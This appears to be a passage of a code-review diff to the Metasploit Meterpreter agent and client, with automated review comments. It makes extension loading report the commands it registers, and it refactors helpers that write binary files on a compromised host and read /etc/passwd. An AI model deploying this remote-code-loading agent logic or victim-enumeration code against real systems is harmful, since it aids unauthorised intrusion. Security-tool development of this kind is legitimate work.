my_print("doing core_loadlib");
$data_tlv = packet_get_tlv($req, TLV_TYPE_DATA);
if (($data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED) {
return ERROR_FAILURE;
- } else {
- eval($data_tlv['value']);
- return ERROR_SUCCESS;
}
+ $tmp = $commands;
+ eval($data_tlv['value']);
+ $new = array_diff($commands, $tmp);
+ foreach ($new as $meth) {
+ packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, $meth));
+ }
+
+ return ERROR_SUCCESS;
}
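Review bot: `$new = array_diff($commands, $tmp);` reports only names that were absent before the eval, so loading an extension a second time (or one whose commands were already registered) returns no TLV_TYPE_METHOD entries and the client will conclude nothing was loaded; if re-loading is an expected path, return the full list registered by this eval or document that re-loads report nothing. The `$tmp = $commands;` snapshot is correct as written, since PHP copies arrays by value.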
19 ...al/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/CommandManager.java
@@ -2,6 +2,7 @@
import java.util.HashMap;
import java.util.Map;
+import java.util.Vector;
import com.metasploit.meterpreter.command.Command;
import com.metasploit.meterpreter.command.NotYetImplementedCommand;
@@ -16,6 +17,7 @@
private final int javaVersion;
private Map/* <String,Command> */registeredCommands = new HashMap();
+ private Vector/* <String> */newCommands = new Vector();
protected CommandManager() throws Exception {
// get the API version, which might be different from the
@@ -97,6 +99,7 @@ public void registerCommand(String command, Class commandClass, int version, int
}
Command cmd = (Command) commandClass.newInstance();
registeredCommands.put(command, cmd);
+ newCommands.add(command);
}
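Review bot: `newCommands.add(command);` runs on every successful registerCommand call, including when the same name is registered twice within one load (for example an extension overriding an existing handler), so a method can appear twice in the reported list; guard with `if (!newCommands.contains(command))` or back the list with a Set. Because registeredCommands is a Map, the duplicate silently replaces the earlier handler, which the returned list will not reveal either.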
/**
@@ -108,4 +111,18 @@ public Command getCommand(String name) {
cmd = NotYetImplementedCommand.INSTANCE;
return cmd;
}
-}
+
+ /**
+ * Reset the list of commands loaded by the last core_loadlib call
+ */
+ public void resetNewCommands() {
+ newCommands.clear();
+ }
+
+ /**
+ * Retrieves the list of commands loaded by the last core_loadlib call
+ */
+ public String[] getNewCommands() {
+ return (String[]) newCommands.toArray(new String[newCommands.size()]);
+ }
+}
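Review bot: the Javadoc on getNewCommands should say that the result is only meaningful between a resetNewCommands() call and the extension load it brackets, and should carry a `@return` line; the two new comments also mix imperative ("Reset the list") and descriptive ("Retrieves the list") voice, so pick one.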
6 external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
@@ -322,7 +322,7 @@ public void writeRequestPacket(String method, TLVPacket tlv) throws IOException
* @param data
* The extension jar's content as a byte array
*/
- public void loadExtension(byte[] data) throws Exception {
+ public String[] loadExtension(byte[] data) throws Exception {
ClassLoader classLoader = getClass().getClassLoader();
if (loadExtensions) {
URL url = MemoryBufferURLConnection.createURL(data, "application/jar");
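Review bot: the return type changes from void to `String[]` but the Javadoc block ending just above the signature (`@param data`) gains no `@return` line; add one describing the array of method names the extension registered.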
@@ -331,6 +331,8 @@ public void loadExtension(byte[] data) throws Exception {
JarInputStream jis = new JarInputStream(new ByteArrayInputStream(data));
String loaderName = (String) jis.getManifest().getMainAttributes().getValue("Extension-Loader");
ExtensionLoader loader = (ExtensionLoader) classLoader.loadClass(loaderName).newInstance();
+ commandManager.resetNewCommands();
loader.load(commandManager);
+ return commandManager.getNewCommands();
}
-}
+}
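Review bot: the sequence `commandManager.resetNewCommands();`, `loader.load(commandManager);`, `return commandManager.getNewCommands();` is not atomic; if two core_loadlib requests could ever be dispatched concurrently, one load's commands would be attributed to the other. If command dispatch is single-threaded, a comment saying so is enough; otherwise have load return its own list instead of going through shared state in CommandManager.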
8 ...source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/core/core_loadlib.java
@@ -9,7 +9,11 @@
public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
byte[] data = request.getRawValue(TLVType.TLV_TYPE_DATA);
- meterpreter.loadExtension(data);
+ String[] commands = meterpreter.loadExtension(data);
+ for (int i = 0; i < commands.length; i++) {
+ response.addOverflow(TLVType.TLV_TYPE_METHOD, commands[i]);
+ }
+
return ERROR_SUCCESS;
}
-}
+}
18 external/source/meterpreter/source/common/base.c
@@ -116,7 +116,7 @@ Command commands[] =
};
// Dynamically registered command extensions
-Command *extensionList = NULL;
+Command *extension_commands = NULL;
/*
* Dynamically register a custom command handler
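Review bot: the rename of the global `extensionList` to `extension_commands` is mechanical within this file, but it is a non-static global; confirm that every other translation unit referencing it (the posix and win remote_dispatch.c files in this commit's file list are the likely ones) is updated in the same commit, or the server will fail at link time.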
@@ -133,13 +133,13 @@ DWORD command_register(Command *command)
memcpy(newCommand, command, sizeof(Command));
dprintf("Setting new command...");
- if (extensionList)
- extensionList->prev = newCommand;
+ if (extension_commands)
+ extension_commands->prev = newCommand;
dprintf("Fixing next/prev...");
- newCommand->next = extensionList;
+ newCommand->next = extension_commands;
newCommand->prev = NULL;
- extensionList = newCommand;
+ extension_commands = newCommand;
dprintf("Done...");
return ERROR_SUCCESS;
@@ -154,7 +154,7 @@ DWORD command_deregister(Command *command)
DWORD res = ERROR_NOT_FOUND;
// Search the extension list for the command
- for (current = extensionList, prev = NULL;
+ for (current = extension_commands, prev = NULL;
current;
prev = current, current = current->next)
{
@@ -164,7 +164,7 @@ DWORD command_deregister(Command *command)
if (prev)
prev->next = current->next;
else
- extensionList = current->next;
+ extension_commands = current->next;
if (current->next)
current->next->prev = prev;
@@ -288,7 +288,7 @@ DWORD THREADCALL command_process_thread( THREAD * thread )
}
// Regardless of error code, try to see if someone has overriden a base handler
- for( current = extensionList, result = ERROR_NOT_FOUND ;
+ for( current = extension_commands, result = ERROR_NOT_FOUND ;
result == ERROR_NOT_FOUND && current && current->method ; current = current->next )
{
if( strcmp( current->method, method ) )
@@ -373,7 +373,7 @@ DWORD command_process_remote(Remote *remote, Packet *inPacket)
// Regardless of error code, try to see if someone has overriden
// a base handler
- for (current = extensionList, res = ERROR_NOT_FOUND;
+ for (current = extension_commands, res = ERROR_NOT_FOUND;
res == ERROR_NOT_FOUND && current && current->method;
current = current->next)
{
6 external/source/meterpreter/source/extensions/stdapi/server/net/config/interface.c
@@ -314,9 +314,9 @@ int get_interfaces_linux(Remote *remote, Packet *response) {
tlv_cnt++;
for (j = 0; j < ifaces->ifaces[i].addr_count; j++) {
- if (allocd_entries < tlv_cnt+3) {
- entries = realloc(entries, sizeof(Tlv) * (tlv_cnt+3));
- allocd_entries += 3;
+ if (allocd_entries < tlv_cnt+2) {
+ entries = realloc(entries, sizeof(Tlv) * (tlv_cnt+2));
+ allocd_entries += 2;
}
if (ifaces->ifaces[i].addr_list[j].family == AF_INET) {
dprintf("ip addr for %s", ifaces->ifaces[i].name);
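Review bot: `allocd_entries += 2` no longer tracks the real size of the buffer, which `realloc` sets to exactly `tlv_cnt + 2` elements; when `allocd_entries` was `tlv_cnt + 1` before the call it becomes `tlv_cnt + 3`, one more than was allocated. The check is re-run every iteration so this does not overrun today, but the bookkeeping should read `allocd_entries = tlv_cnt + 2` to match what was allocated. Also assign the `realloc` result to a temporary and bail out on NULL: writing it straight into `entries` leaks the old block on failure and the later stores into `entries[...]` then go through a null pointer.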
2  external/source/meterpreter/source/extensions/stdapi/server/stdapi.c
@@ -296,6 +296,7 @@ Command customCommands[] =
{ request_sys_config_getprivs, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
+#ifdef _WIN32
{ "stdapi_sys_config_steal_token",
{ request_sys_config_steal_token, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
@@ -304,6 +305,7 @@ Command customCommands[] =
{ request_sys_config_drop_token, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
+#endif
// Net
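Review bot: the `#ifdef _WIN32` guard correctly drops `steal_token` and `drop_token` from the POSIX command table, but the entry just above it, `request_sys_config_getprivs`, is equally Windows-specific (it enables token privileges); check whether it belongs inside the same guard so that the method list the POSIX server now reports back from `core_loadlib` only contains commands it can actually service.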
10 external/source/meterpreter/source/server/posix/remote_dispatch.c
@@ -1,6 +1,7 @@
#include <dlfcn.h>
#include "metsrv.h"
+extern Command *extension_commands;
DWORD
request_core_loadlib(Remote *remote, Packet *packet)
@@ -12,7 +13,9 @@ request_core_loadlib(Remote *remote, Packet *packet)
DWORD flags = 0;
PCHAR targetPath;
int local_error = 0;
-
+ Command *command;
+ Command *first = extension_commands;
+
do
{
Tlv dataTlv;
@@ -64,6 +67,11 @@ request_core_loadlib(Remote *remote, Packet *packet)
dprintf("calling InitServerExtension");
res = init(remote);
}
+ if (response) {
+ for (command = extension_commands; command != first; command = command->next) {
+ packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
+ }
+ }
}
} while (0);
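Review bot: the `command != first` walk assumes `first` is still in the list after `init(remote)` has run. Since `command_register` prepends, the new commands are exactly the nodes before `first`, but if the extension's init deregistered an existing command (including `first` itself) the loop runs off the end and reads `command->next` through NULL. Make the condition `command && command != first`; the `first == NULL` case on the very first load is already handled because the list is NULL-terminated.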
10 external/source/meterpreter/source/server/win/remote_dispatch.c
@@ -5,6 +5,8 @@ extern HINSTANCE hAppInstance;
// see remote_dispatch_common.c
extern LIST * extension_list;
+// see common/base.c
+extern Command *extension_commands;
DWORD request_core_loadlib(Remote *remote, Packet *packet)
{
@@ -15,6 +17,9 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
DWORD flags = 0;
BOOL bLibLoadedReflectivly = FALSE;
+ Command *first = extension_commands;
+ Command *command;
+
do
{
libraryPath = packet_get_tlv_value_string(packet,
@@ -124,6 +129,11 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
free( extension );
}
dprintf("[SERVER] Called init()...");
+ if (response) {
+ for (command = extension_commands; command != first; command = command->next) {
+ packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
+ }
+ }
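Review bot: same loop as in the POSIX dispatcher, same issue: if `init()` deregistered `first`, `for (command = extension_commands; command != first; ...)` walks past the end of the list and dereferences NULL. Use `command && command != first` here too, and since this block and the POSIX one are now identical, consider a shared `reply_with_new_commands(response, first)` helper in common/base.c next to the list it walks.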
}
}
116 lib/msf/core/post/file.rb
@@ -212,7 +212,7 @@ def _read_file_meterpreter(file_name)
return nil
end
- data = ''
+ data = fd.read
begin
until fd.eof?
data << fd.read
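Review bot: `data = fd.read` followed by `data << fd.read` inside `until fd.eof?` relies on the channel's `read` returning a String rather than `nil` on an empty file; if it returns `nil` there, the method now returns `nil` where it used to return `''`, and any caller that does `data.length` breaks. `data = fd.read || ''` preserves the old contract.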
@@ -247,77 +247,83 @@ def _write_file_unix_shell(file_name, data, append=false)
chunks = []
command = nil
+ encoding = :hex
line_max = _unix_max_line_length
# Leave plenty of room for the filename we're writing to and the
# command to echo it out
line_max -= file_name.length - 64
- # Default to simple echo. If the data is binary, though, we have to do
- # something fancy
- if d =~ /[^[:print:]]/
- # Ordered by descending likeliness to work
- [
- %q^perl -e 'print("\x41")'^,
- # POSIX awk doesn't have \xNN escapes, use gawk to ensure we're
- # getting the GNU version.
- %q^gawk 'BEGIN {ORS = ""; print "\x41"}' </dev/null^,
- # bash and zsh's echo builtins are apparently the only ones
- # that support both -e and -n as we need them. Most others
- # treat all options as just more arguments to print. In
- # particular, the standalone /bin/echo or /usr/bin/echo appear
- # never to have -e so don't bother trying them.
- %q^echo -ne '\x41'^,
- # printf seems to have different behavior on bash vs sh vs
- # other shells, try a full path (and hope it's the actual path)
- %q^/usr/bin/printf '\x41'^,
- %q^printf '\x41'^,
- ].each { |c|
- a = session.shell_command_token("#{c}")
- if "A" == a
- command = c
- break
- #else
- # p a
- end
- }
-
- if command.nil?
- raise RuntimeError, "Can't find command on the victim for writing binary data", caller
+ # Ordered by descending likeliness to work
+ [
+ # POSIX standard requires %b which expands octal (but not hex)
+ # escapes in the argument. However, some versions truncate input on
+ # nulls, so "printf %b '\0\101'" produces a 0-length string. The
+ # standalon version seems to be more likely to work than the buitin
+ # version, so try it first
+ { :cmd => %q^/usr/bin/printf %b 'CONTENTS'^ , :enc => :octal },
+ { :cmd => %q^printf %b 'CONTENTS'^ , :enc => :octal },
+ # Perl supports both octal and hex escapes, but octal is usually
+ # shorter (e.g. 0 becomes \0 instead of \x00)
+ { :cmd => %q^perl -e 'print("CONTENTS")'^ , :enc => :octal },
+ # POSIX awk doesn't have \xNN escapes, use gawk to ensure we're
+ # getting the GNU version.
+ { :cmd => %q^gawk 'BEGIN {ORS = ""; print "CONTENTS"}' </dev/null^ , :enc => :hex },
+ # Use echo as a last resort since it frequently doesn't support -e
+ # or -n. bash and zsh's echo builtins are apparently the only ones
+ # that support both. Most others treat all options as just more
+ # arguments to print. In particular, the standalone /bin/echo or
+ # /usr/bin/echo appear never to have -e so don't bother trying
+ # them.
+ { :cmd => %q^echo -ne 'CONTENTS'^ , :enc => :hex },
+ ].each { |foo|
+ # Some versions of printf mangle %.
+ test_str = "\0\xff\xfeABCD\x7f%%\r\n"
+ if foo[:enc] == :hex
+ cmd = foo[:cmd].sub("CONTENTS"){ Rex::Text.to_hex(test_str) }
+ else
+ cmd = foo[:cmd].sub("CONTENTS"){ Rex::Text.to_octal(test_str) }
+ end
+ a = session.shell_command_token("#{cmd}")
+ if test_str == a
+ command = foo[:cmd]
+ encoding = foo[:enc]
+ break
+ else
+ p a
end
+ }
+
+ if command.nil?
+ raise RuntimeError, "Can't find command on the victim for writing binary data", caller
+ end
- # each byte will balloon up to 4 when we hex encode
- max = line_max/4
- i = 0
- while (i < d.length)
+ # each byte will balloon up to 4 when we encode
+ # (A becomes \x41 or \101)
+ max = line_max/4
+
+ i = 0
+ while (i < d.length)
+ if encoding == :hex
chunks << Rex::Text.to_hex(d.slice(i...(i+max)))
- i += max
- end
- else
- i = 0
- while (i < d.length)
- chunk = d.slice(i...(i+line_max))
- # POSIX standard says single quotes cannot appear inside single
- # quotes and can't be escaped. Replace them with an equivalent.
- # (Close single quotes, open double quotes containing a single
- # quote, re-open single qutoes)
- chunk.gsub!("'", %q|'"'"'|)
- chunks << chunk
- i += line_max
+ else
+ chunks << Rex::Text.to_octal(d.slice(i...(i+max)))
end
- command = "echo -n '\\x41'"
+ i += max
end
- vprint_status("Writing #{d.length} bytes in #{chunks.length} chunks, using #{command.split(" ",2).first}")
+
+ vprint_status("Writing #{d.length} bytes in #{chunks.length} chunks of #{chunks.first.length} bytes (#{encoding}-encoded), using #{command.split(" ",2).first}")
# The first command needs to use the provided redirection for either
# appending or truncating.
- cmd = command.sub("\\x41", chunks.shift)
+ cmd = command.sub("CONTENTS") { chunks.shift }
session.shell_command_token("#{cmd} #{redirect} '#{file_name}'")
# After creating/truncating or appending with the first command, we
# need to append from here on out.
chunks.each { |chunk|
- cmd = command.sub("\\x41", chunk)
+ vprint_status("Next chunk is #{chunk.length} bytes")
+ cmd = command.sub("CONTENTS") { chunk }
session.shell_command_token("#{cmd} >> '#{file_name}'")
}
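Review bot: the context line `line_max -= file_name.length - 64` has an operator-precedence bug: it subtracts `(file_name.length - 64)`, i.e. it adds 64 and subtracts the name length, the opposite of what the comment ("leave plenty of room") intends. It should be `line_max -= file_name.length + 64`. Two more points in the new code: the `else` branch of the probe loop now runs `p a` unconditionally, which dumps raw shell output to stdout for every failed probe (use `vprint_status` or drop it), and `chunks.first.length` in the status message raises NoMethodError when `d` is empty, so return early or guard on `chunks.empty?`. Minor: "standalon" and "buitin" in the comment.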
@@ -336,7 +342,11 @@ def _unix_max_line_length
i=`expr $i + 1`; str=$str$str;\
done; echo $max'
line_max = session.shell_command_token(calc_line_max).to_i
+
+ # Fall back to a conservative 4k which should work on even the most
+ # restrictive of embedded shells.
line_max = (line_max == 0 ? 4096 : line_max)
+ vprint_status("Max line length is #{line_max}")
line_max
end
203 lib/msf/core/post/linux/system.rb
@@ -6,145 +6,92 @@ class Post
module Linux
module System
include ::Msf::Post::Common
- include ::Msf::Post::File
-
- # Returns a Hash containing Distribution Name, Version and Kernel Information
- def get_sysinfo
- system_data = {}
- etc_files = cmd_exec("ls /etc").split()
-
- # Debian
- if etc_files.include?("debian_version")
- kernel_version = cmd_exec("uname -a")
- if kernel_version =~ /Ubuntu/
- version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "ubuntu"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
- else
- version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "debian"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
- end
-
- # Amazon
- elsif etc_files.include?("system-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/system-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "amazon"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
-
- # Fedora
- elsif etc_files.include?("fedora-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/fedora-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "fedora"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
-
- # Oracle Linux
- elsif etc_files.include?("enterprise-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/enterprise-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "oracle"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
+ include ::Msf::Post::File
- # RedHat
- elsif etc_files.include?("redhat-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/redhat-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "redhat"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
+ include ::Msf::Post::Unix
- # Arch
- elsif etc_files.include?("arch-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/arch-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "arch"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
+ # Returns a Hash containing Distribution Name, Version and Kernel Information
+ def get_sysinfo
+ system_data = {}
+ etc_files = cmd_exec("ls /etc").split()
- # Slackware
- elsif etc_files.include?("slackware-version")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/slackware-version").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "slackware"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
-
- # Mandrake
- elsif etc_files.include?("mandrake-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/mandrake-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "mandrake"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
+ kernel_version = cmd_exec("uname -a")
+ system_data[:kernel] = kernel_version
- #SuSE
- elsif etc_files.include?("SuSE-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/SuSE-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "suse"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
-
- # Gentoo
- elsif etc_files.include?("gentoo-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/gentoo-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "gentoo"
+ # Debian
+ if etc_files.include?("debian_version")
+ if kernel_version =~ /Ubuntu/
+ version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "ubuntu"
system_data[:version] = version
- system_data[:kernel] = kernel_version
else
-
- # Others
- kernel_version = cmd_exec("uname -a")
version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "linux"
+ system_data[:distro] = "debian"
system_data[:version] = version
- system_data[:kernel] = kernel_version
end
- return system_data
- end
- # Returns an array of hashes each representing a user
- # Keys are name, uid, gid, info, dir and shell
- def get_users
- users = []
- cmd_out = cmd_exec("cat /etc/passwd").split("\n")
- cmd_out.each do |l|
- entry = {}
- user_field = l.split(":")
- entry[:name] = user_field[0]
- entry[:uid] = user_field[2]
- entry[:gid] = user_field[3]
- entry[:info] = user_field[4]
- entry[:dir] = user_field[5]
- entry[:shell] = user_field[6]
- users << entry
- end
- return users
- end
-
- # Returns an array of hashes each hash representing a user group
- # Keys are name, gid and users
- def get_groups
- groups = []
- cmd_out = cmd_exec("cat /etc/group").split("\n")
- cmd_out.each do |l|
- entry = {}
- user_field = l.split(":")
- entry[:name] = user_field[0]
- entry[:gid] = user_field[2]
- entry[:users] = user_field[3]
- groups << entry
- end
- return groups
+ # Amazon
+ elsif etc_files.include?("system-release")
+ version = read_file("/etc/system-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "amazon"
+ system_data[:version] = version
+
+ # Fedora
+ elsif etc_files.include?("fedora-release")
+ version = read_file("/etc/fedora-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "fedora"
+ system_data[:version] = version
+
+ # Oracle Linux
+ elsif etc_files.include?("enterprise-release")
+ version = read_file("/etc/enterprise-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "oracle"
+ system_data[:version] = version
+
+ # RedHat
+ elsif etc_files.include?("redhat-release")
+ version = read_file("/etc/redhat-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "redhat"
+ system_data[:version] = version
+
+ # Arch
+ elsif etc_files.include?("arch-release")
+ version = read_file("/etc/arch-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "arch"
+ system_data[:version] = version
+
+ # Slackware
+ elsif etc_files.include?("slackware-version")
+ version = read_file("/etc/slackware-version").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "slackware"
+ system_data[:version] = version
+
+ # Mandrake
+ elsif etc_files.include?("mandrake-release")
+ version = read_file("/etc/mandrake-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "mandrake"
+ system_data[:version] = version
+
+ #SuSE
+ elsif etc_files.include?("SuSE-release")
+ version = read_file("/etc/SuSE-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "suse"
+ system_data[:version] = version
+
+ # Gentoo
+ elsif etc_files.include?("gentoo-release")
+ version = read_file("/etc/gentoo-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "gentoo"
+ system_data[:version] = version
+ else
+
+ # Others
+ version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "linux"
+ system_data[:version] = version
end
+ return system_data
+ end
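Review bot: `include ::Msf::Post::Unix` needs a matching `require 'msf/core/post/unix'` at the top of this file (the Solaris change adds one; this hunk starts at line 6, so the require block is not visible here); without it the include depends on load order. The `get_users` and `get_groups` methods removed here must be provided by `Msf::Post::Unix` with the same hash keys (`name`, `uid`, `gid`, `info`, `dir`, `shell` and `name`, `gid`, `users`), otherwise every post module that calls them on a Linux session breaks.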
end # System
62 lib/msf/core/post/solaris/system.rb
@@ -1,59 +1,29 @@
require 'msf/core/post/common'
require 'msf/core/post/file'
+require 'msf/core/post/unix'
module Msf
class Post
module Solaris
module System
include ::Msf::Post::Common
- include ::Msf::Post::File
+ include ::Msf::Post::File
- # Returns a Hash containing Distribution Name, Version and Kernel Information
- def get_sysinfo
- system_data = {}
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/release").split("\n")[0].strip
- system_data[:version] = version
- system_data[:kernel] = kernel_version
- system_data[:hostname] = kernel_version.split(" ")[1]
- return system_data
- end
-
- # Returns an array of hashes each representing a user
- # Keys are name, uid, gid, info, dir and shell
- def get_users
- users = []
- cmd_out = cmd_exec("cat /etc/passwd").split("\n")
- cmd_out.each do |l|
- entry = {}
- user_field = l.split(":")
- entry[:name] = user_field[0]
- entry[:uid] = user_field[2]
- entry[:gid] = user_field[3]
- entry[:info] = user_field[4]
- entry[:dir] = user_field[5]
- entry[:shell] = user_field[6]
- users << entry
- end
- return users
- end
-
- # Returns an array of hashes each hash representing a user group
- # Keys are name, gid and users
- def get_groups
- groups = []
- cmd_out = cmd_exec("cat /etc/group").split("\n")
- cmd_out.each do |l|
- entry = {}
- user_field = l.split(":")
- entry[:name] = user_field[0]
- entry[:gid] = user_field[2]
- entry[:users] = user_field[3]
- groups << entry
- end
- return groups
- end
+ include ::Msf::Post::Unix
+ #
+ # Returns a Hash containing Distribution Name, Version and Kernel
+ # Information
+ #
+ def get_sysinfo
+ system_data = {}
+ kernel_version = cmd_exec("uname -a")
+ version = read_file("/etc/release").split("\n")[0].strip
+ system_data[:version] = version
+ system_data[:kernel] = kernel_version
+ system_data[:hostname] = kernel_version.split(" ")[1]
+ return system_data
+ end
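Review bot: the rewritten doc comment says "Distribution Name, Version and Kernel Information", but the Solaris hash only carries `:version`, `:kernel` and `:hostname` and never sets `:distro`; either document what is actually returned or add `system_data[:distro] = "solaris"` so callers can treat Linux and Solaris results uniformly.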
end # System
end # Solaris
23 lib/rex/post/meterpreter/client.rb
@@ -104,6 +104,7 @@ def init_meterpreter(sock,opts={})
self.alive = true
self.target_id = opts[:target_id]
self.capabilities = opts[:capabilities] || {}
+ self.commands = []
self.conn_id = opts[:conn_id]
@@ -281,6 +282,7 @@ def Client.default_timeout
# if a matching extension alias exists for the supplied symbol.
#
def method_missing(symbol, *args)
+ #$stdout.puts("method_missing: #{symbol}")
self.ext_aliases.aliases[symbol.to_s]
end
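Review bot: the commented-out `#$stdout.puts("method_missing: #{symbol}")` is leftover debugging; drop it rather than commit it.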
@@ -294,7 +296,9 @@ def method_missing(symbol, *args)
# Loads the client half of the supplied extension and initializes it as a
# registered extension that can be reached through client.ext.[extension].
#
- def add_extension(name)
+ def add_extension(name, commands=[])
+ self.commands |= commands
+
# Check to see if this extension has already been loaded.
if ((klass = self.class.check_ext_hash(name.downcase)) == nil)
old = Rex::Post::Meterpreter::Extensions.constants
@@ -341,6 +345,18 @@ def each_extension(&block)
#
def register_extension_alias(name, ext)
self.ext_aliases.aliases[name] = ext
+ # Whee! Syntactic sugar, where art thou?
+ #
+ # Create an instance method on this object called +name+ that returns
+ # +ext+. We have to do it this way instead of simply
+ # self.class.class_eval so that other meterpreter sessions don't get
+ # extension methods when this one does
+ (class << self; self; end).class_eval do
+ define_method(name.to_sym) do
+ ext
+ end
+ end
+ ext
end
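Review bot: `define_method(name.to_sym)` on the singleton class silently overrides any existing `Client` method whose name matches an alias, and the alias names come from whatever extension was just loaded (an alias called `sock`, `commands` or `core` would clobber the real accessor). Guard with `unless respond_to?(name.to_sym)` or raise on collision. Also note that the method's return value changes from the hash assignment to `ext`; that is reasonable, but worth a line in the comment.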
#
@@ -445,10 +461,15 @@ def unicode_filter_decode(str)
# Flag indicating whether to hex-encode UTF-8 file names and other strings
#
attr_accessor :encode_unicode
+ #
+ # A list of the commands
+ #
+ attr_reader :commands
protected
attr_accessor :parser, :ext_aliases # :nodoc:
attr_writer :ext, :sock # :nodoc:
+ attr_writer :commands # :nodoc:
end
end; end; end
14 lib/rex/post/meterpreter/client_core.rb
@@ -121,7 +121,12 @@ def load_library(opts)
raise RuntimeError, "The core_loadlib request failed with result: #{response.result}.", caller
end
- return true
+ commands = []
+ response.each(TLV_TYPE_METHOD) { |c|
+ commands << c.value
+ }
+
+ return commands
end
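Review bot: `load_library` now returns the method names the server reported instead of `true`, and a server built before this change sends no `TLV_TYPE_METHOD` TLVs; for such a server `commands` is empty, `client.commands` stays empty, and every dispatcher's `delete_if` filter hides all of its commands. Either treat an empty list as "unknown, show everything" at the dispatcher level, or gate the filtering on the server having reported at least one method. Also check any other caller of `load_library` that tested its boolean return.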
#
@@ -150,13 +155,12 @@ def use(mod, opts = { })
path = ::File.expand_path(path)
# Load the extension DLL
- if (load_library(
+ commands = load_library(
'LibraryFilePath' => path,
'UploadLibrary' => true,
'Extension' => true,
- 'SaveToDisk' => opts['LoadFromDisk']))
- client.add_extension(mod)
- end
+ 'SaveToDisk' => opts['LoadFromDisk'])
+ client.add_extension(mod, commands)
return true
end
20 lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
@@ -22,7 +22,7 @@ def initialize(client)
client.register_extension_aliases(
[
- {
+ {
'name' => 'sniffer',
'ext' => self
},
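Review bot: every hunk in this file is whitespace-only (trailing whitespace and indentation); they inflate the feature diff without changing behaviour and belong in a separate cleanup commit.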
@@ -42,19 +42,19 @@ def interfaces()
ikeys = %W{idx name description type mtu wireless usable dhcp}
ikeys.each_index { |i| iface[ikeys[i]] = vals[i] }
ifaces << iface
- }
+ }
return ifaces
end
-
+
# Start a packet capture on an opened interface
def capture_start(intf,maxp=200000,filter="")
request = Packet.create_request('sniffer_capture_start')
request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
request.add_tlv(TLV_TYPE_SNIFFER_PACKET_COUNT, maxp.to_i)
request.add_tlv(TLV_TYPE_SNIFFER_ADDITIONAL_FILTER, filter) if filter.length > 0
- response = client.send_request(request)
+ response = client.send_request(request)
end
-
+
# Stop an active packet capture
def capture_stop(intf)
request = Packet.create_request('sniffer_capture_stop')
@@ -65,7 +65,7 @@ def capture_stop(intf)
:bytes => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
}
end
-
+
# Retrieve stats about a current capture
def capture_stats(intf)
request = Packet.create_request('sniffer_capture_stats')
@@ -87,7 +87,7 @@ def capture_release(intf)
:bytes => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
}
end
-
+
# Buffer the current capture to a readable buffer
def capture_dump(intf)
request = Packet.create_request('sniffer_capture_dump')
@@ -99,19 +99,19 @@ def capture_dump(intf)
:linktype => response.get_tlv_value(TLV_TYPE_SNIFFER_INTERFACE_ID),
}
end
-
+
# Retrieve the packet data for the specified capture
def capture_dump_read(intf, len=16384)
request = Packet.create_request('sniffer_capture_dump_read')
request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
- request.add_tlv(TLV_TYPE_SNIFFER_BYTE_COUNT, len.to_i)
